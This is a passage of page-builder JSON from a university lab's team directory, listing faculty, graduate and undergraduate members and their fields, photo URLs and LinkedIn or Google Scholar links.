Professional<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/faris-hawamdeh\\/?trk=public_profile_publication_contributor-image\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/faris-hawamdeh\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Faris-Hawamdeh\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c69\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c91\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassani\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=9KRgkCcAAAAJ&hl=en&oi=ao\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-sara-edwards1-e1697206932891.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1754,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c140\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c141\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c142\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c140\",\"index\":2,\"id\":\"182-c143\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c140\",\"index\":3,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c140\",\"index\":1,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c74\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c73\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c148\",\"parentId\":\"182-c147\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c147\",\"parentId\":\"182-c146\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c146\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c151\",\"parentId\":\"182-c150\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c151\",\"index\":2,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c151\",\"index\":1,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c156\",\"parentId\":\"182-c150\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c156\",\"index\":0,\"id\":\"182-c157\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c156\",\"index\":0,\"id\":\"182-c158\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c156\",\"index\":2,\"id\":\"182-c159\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM       https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c156\",\"index\":1,\"id\":\"182-c160\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c150\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c149\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c163\",\"parentId\":\"182-c162\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c162\",\"parentId\":\"182-c161\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c161\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c166\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1772,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah 